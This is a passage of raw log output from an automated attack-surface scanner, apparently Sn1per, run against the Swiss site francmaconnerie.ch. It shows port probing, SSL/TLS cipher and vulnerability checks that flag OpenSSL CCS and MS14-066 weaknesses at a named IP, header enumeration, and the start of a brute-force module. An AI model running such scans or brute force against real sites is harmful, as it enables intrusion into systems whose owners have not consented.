1536. |_[ + ] Information Server:: , , IP::0 
1537. |_[ + ] More details:: 
1538. |_[ + ] Found:: UNIDENTIFIED
1539. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1540. 
1541.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1542. |_[ + ] [ 17 / 20 ]-[19:46:22] [ - ] 
1543. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Planche sur l invisible_0.pdf ]
1544. |_[ + ] Exploit:: 
1545. |_[ + ] Information Server:: , , IP::0 
1546. |_[ + ] More details:: 
1547. |_[ + ] Found:: UNIDENTIFIED
1548. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1549. 
1550.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1551. |_[ + ] [ 18 / 20 ]-[19:46:27] [ - ] 
1552. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Planche Orateur sur L'Amour.pdf ]
1553. |_[ + ] Exploit:: 
1554. |_[ + ] Information Server:: , , IP::0 
1555. |_[ + ] More details:: 
1556. |_[ + ] Found:: UNIDENTIFIED
1557. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1558. 
1559.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1560. |_[ + ] [ 19 / 20 ]-[19:46:32] [ - ] 
1561. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Orateur à un nouvel initié Fratrie ou Fraternité.pdf ]
1562. |_[ + ] Exploit:: 
1563. |_[ + ] Information Server:: , , IP::0 
1564. |_[ + ] More details:: 
1565. |_[ + ] Found:: UNIDENTIFIED
1566. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1567.  
1568. [ INFO ] [ Shutting down ]
1569. [ INFO ] [ End of process INURLBR at [07-01-2018 19:46:32]
1570. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
1571. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-francmaconnerie.ch.txt ]
1572. |_________________________________________________________________________________________
1573.  
1574. \_________________________________________________________________________________________/
1575.  
1576.  + -- --=[Port 110 closed... skipping.
1577.  + -- --=[Port 111 closed... skipping.
1578.  + -- --=[Port 135 closed... skipping.
1579.  + -- --=[Port 139 closed... skipping.
1580.  + -- --=[Port 161 closed... skipping.
1581.  + -- --=[Port 162 closed... skipping.
1582.  + -- --=[Port 389 closed... skipping.
1583.  + -- --=[Port 443 opened... running tests...
1584. ====================================================================================
1585.  CHECKING FOR WAF 
1586. ====================================================================================
1587.  
1588. ^ ^
1589. _ __ _ ____ _ __ _ _ ____
1590. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1591. | V V // o // _/ | V V // 0 // 0 // _/
1592. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1593. <
1594. ...'
1595.  
1596. WAFW00F - Web Application Firewall Detection Tool
1597.  
1598. By Sandro Gauci && Wendel G. Henrique
1599.  
1600. Checking https://francmaconnerie.ch
1601.  
1602. ====================================================================================
1603.  GATHERING HTTP INFO 
1604. ====================================================================================
1605. https://francmaconnerie.ch [ Unassigned]
1606.  
1607. ====================================================================================
1608.  GATHERING SSL/TLS INFO 
1609. ====================================================================================
1610.  
1611.  
1612.  
1613. AVAILABLE PLUGINS
1614. -----------------
1615.  
1616. PluginHSTS
1617. PluginOpenSSLCipherSuites
1618. PluginCertInfo
1619. PluginSessionRenegotiation
1620. PluginCompression
1621. PluginChromeSha1Deprecation
1622. PluginSessionResumption
1623. PluginHeartbleed
1624.  
1625.  
1626.  
1627. CHECKING HOST(S) AVAILABILITY
1628. -----------------------------
1629.  
1630. francmaconnerie.ch => WARNING: Could not connect (timeout); discarding corresponding tasks.
1631.  
1632.  
1633.  
1634. SCAN COMPLETED IN 5.03 S
1635. ------------------------
1636. Version: 1.11.10-static
1637. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1638. 
1639. Testing SSL server francmaconnerie.ch on port 443 using SNI name francmaconnerie.ch
1640.  
1641. TLS Fallback SCSV:
1642. Server does not support TLS Fallback SCSV
1643.  
1644. TLS renegotiation:
1645. Secure session renegotiation supported
1646.  
1647. TLS Compression:
1648. Compression disabled
1649.  
1650. Heartbleed:
1651. TLS 1.2 not vulnerable to heartbleed
1652. TLS 1.1 not vulnerable to heartbleed
1653. TLS 1.0 not vulnerable to heartbleed
1654.  
1655. Supported Server Cipher(s):
1656. Preferred TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
1657. Accepted TLSv1.0 256 bits AES256-SHA
1658. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
1659. Accepted TLSv1.0 128 bits AES128-SHA
1660. Accepted TLSv1.0 128 bits RC4-SHA 
1661. Accepted TLSv1.0 128 bits RC4-MD5 
1662. Accepted TLSv1.0 112 bits EDH-RSA-DES-CBC3-SHA  DHE 1024 bits
1663. Accepted TLSv1.0 112 bits DES-CBC3-SHA 
1664. Accepted TLSv1.0 56 bits EDH-RSA-DES-CBC-SHA  DHE 1024 bits
1665. Accepted TLSv1.0 56 bits DES-CBC-SHA 
1666. Accepted TLSv1.0 40 bits EXP-EDH-RSA-DES-CBC-SHA  DHE 512 bits
1667. Accepted TLSv1.0 40 bits EXP-DES-CBC-SHA  RSA 512 bits
1668. Accepted TLSv1.0 40 bits EXP-RC2-CBC-MD5  RSA 512 bits
1669. Accepted TLSv1.0 40 bits EXP-RC4-MD5  RSA 512 bits
1670. Preferred SSLv3 256 bits DHE-RSA-AES256-SHA  DHE 1024 bits
1671. Accepted SSLv3 256 bits AES256-SHA 
1672. Accepted SSLv3 128 bits DHE-RSA-AES128-SHA  DHE 1024 bits
1673. Accepted SSLv3 128 bits AES128-SHA 
1674. Accepted SSLv3 128 bits RC4-SHA 
1675. Accepted SSLv3 128 bits RC4-MD5 
1676. Accepted SSLv3 112 bits EDH-RSA-DES-CBC3-SHA  DHE 1024 bits
1677. Accepted SSLv3 112 bits DES-CBC3-SHA 
1678. Accepted SSLv3 56 bits EDH-RSA-DES-CBC-SHA  DHE 1024 bits
1679. Accepted SSLv3 56 bits DES-CBC-SHA 
1680. Accepted SSLv3 40 bits EXP-EDH-RSA-DES-CBC-SHA  DHE 512 bits
1681. Accepted SSLv3 40 bits EXP-DES-CBC-SHA  RSA 512 bits
1682. Accepted SSLv3 40 bits EXP-RC2-CBC-MD5  RSA 512 bits
1683. Accepted SSLv3 40 bits EXP-RC4-MD5  RSA 512 bits
1684.  
1685. SSL Certificate:
1686. Signature Algorithm: sha256WithRSAEncryption
1687. RSA Key Strength: 2048
1688.  
1689. Subject: *.infomaniak.ch
1690. Altnames: DNS:*.infomaniak.ch, DNS:infomaniak.ch
1691. Issuer: COMODO RSA Domain Validation Secure Server CA
1692. [0m
1693. ░ ░ 
1694. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
1695. + -- --=[Checking for DROWN (SSLv2): 93.88.240.208:443
1696. + -- --=[Checking for HeartBleed: 93.88.240.208:443
1697. + -- --=[Checking for OpenSSL CCS: 93.88.240.208:443
1698. FAIL Remote host is affected
1699. + -- --=[Checking for Poodle (SSLv3): 93.88.240.208:443
1700. Preferred SSLv3 256 bits DHE-RSA-AES256-SHA  DHE 1024 bits
1701. Accepted SSLv3 256 bits AES256-SHA 
1702. Accepted SSLv3 128 bits DHE-RSA-AES128-SHA  DHE 1024 bits
1703. Accepted SSLv3 128 bits AES128-SHA 
1704. Accepted SSLv3 128 bits RC4-SHA 
1705. Accepted SSLv3 128 bits RC4-MD5 
1706. Accepted SSLv3 112 bits EDH-RSA-DES-CBC3-SHA  DHE 1024 bits
1707. Accepted SSLv3 112 bits DES-CBC3-SHA 
1708. Accepted SSLv3 56 bits EDH-RSA-DES-CBC-SHA  DHE 1024 bits
1709. Accepted SSLv3 56 bits DES-CBC-SHA 
1710. Accepted SSLv3 40 bits EXP-EDH-RSA-DES-CBC-SHA  DHE 512 bits
1711. Accepted SSLv3 40 bits EXP-DES-CBC-SHA  RSA 512 bits
1712. Accepted SSLv3 40 bits EXP-RC2-CBC-MD5  RSA 512 bits
1713. Accepted SSLv3 40 bits EXP-RC4-MD5  RSA 512 bits
1714. + -- --=[Checking for WinShock (MS14-066): 93.88.240.208:443
1715. Testing if OpenSSL supports the ciphers we are checking for: YES
1716.  
1717. Testing 93.88.240.208:443 for availability of SSL ciphers added in MS14-066...
1718. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
1719. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
1720. Testing cipher AES256-GCM-SHA384: UNSUPPORTED
1721. Testing cipher AES128-GCM-SHA256: UNSUPPORTED
1722. Testing if IIS is running on port 443: NO
1723. Checking if target system is running Windows Server 2012 or later...
1724. Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
1725. Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
1726. 93.88.240.208:443 is patched: NO
1727. + -- --=[Scan Complete!
1728. ====================================================================================
1729.  CHECKING HTTP HEADERS 
1730. ====================================================================================
1731. + -- --=[Checking if X-Content options are enabled on francmaconnerie.ch... 
1732.  
1733. + -- --=[Checking if X-Frame options are enabled on francmaconnerie.ch... 
1734.  
1735. + -- --=[Checking if X-XSS-Protection header is enabled on francmaconnerie.ch... 
1736.  
1737. + -- --=[Checking HTTP methods on francmaconnerie.ch... 
1738.  
1739. + -- --=[Checking if TRACE method is enabled on francmaconnerie.ch... 
1740.  
1741. + -- --=[Checking for META tags on francmaconnerie.ch... 
1742. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
1743.  
1744. + -- --=[Checking for open proxy on francmaconnerie.ch... 
1745.  
1746. + -- --=[Enumerating software on francmaconnerie.ch... 
1747. Server: Apache
1748.  
1749. + -- --=[Checking if Strict-Transport-Security is enabled on francmaconnerie.ch... 
1750.  
1751. + -- --=[Checking for Flash cross-domain policy on francmaconnerie.ch... 
1752. about the error.
1753.  
1754. <!--#else -->
1755.  
1756. If you entered the URL manually please check your
1757. spelling and try again.
1758.  
1759. <!--#endif -->
1760.  
1761. <!--#include virtual="include/bottom.html" -->
1762.  
1763. + -- --=[Checking for Silverlight cross-domain policy on francmaconnerie.ch... 
1764. about the error.
1765.  
1766. <!--#else -->
1767.  
1768. If you entered the URL manually please check your
1769. spelling and try again.
1770.  
1771. <!--#endif -->
1772.  
1773. <!--#include virtual="include/bottom.html" -->
1774.  
1775. + -- --=[Checking for HTML5 cross-origin resource sharing on francmaconnerie.ch... 
1776.  
1777. + -- --=[Retrieving robots.txt on francmaconnerie.ch... 
1778. User-agent: *
1779. Crawl-delay: 10
1780.  
1781. + -- --=[Retrieving sitemap.xml on francmaconnerie.ch... 
1782. about the error.
1783.  
1784. <!--#else -->
1785.  
1786. If you entered the URL manually please check your
1787. spelling and try again.
1788.  
1789. <!--#endif -->
1790.  
1791. <!--#include virtual="include/bottom.html" -->
1792.  
1793. + -- --=[Checking cookie attributes on francmaconnerie.ch... 
1794.  
1795. + -- --=[Checking for ASP.NET Detailed Errors on francmaconnerie.ch... 
1796. about the error.
1797. about the error.
1798.  
1799. 
1800. ====================================================================================
1801.  SAVING SCREENSHOTS 
1802. ====================================================================================
1803. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/francmaconnerie.ch-port443.jpg
1804.  
1805. ====================================================================================
1806.  SCANNING FOR COMMON VULNERABILITIES 
1807. ====================================================================================
1808. ====================================================================================
1809.  SKIPPING FULL NMAP PORT SCAN 
1810. ====================================================================================
1811. ====================================================================================
1812.  RUNNING BRUTE FORCE 
1813. ====================================================================================
1814.  __________ __ ____ ___
1815.  \______ \_______ __ ___/ |_ ____ \ \/ /
1816.  | | _/\_ __ \ | \ __\/ __ \ \ / 
1817.  | | \ | | \/ | /| | \ ___/ / \ 
1818.  |______ / |__| |____/ |__| \___ >___/\ \ 
1819.  \/ \/ \_/
1820.  
1821.  + -- --=[BruteX v1.7 by 1N3
1822.  + -- --=[http://crowdshield.com
1823.  
1824. #######################################################################################################################################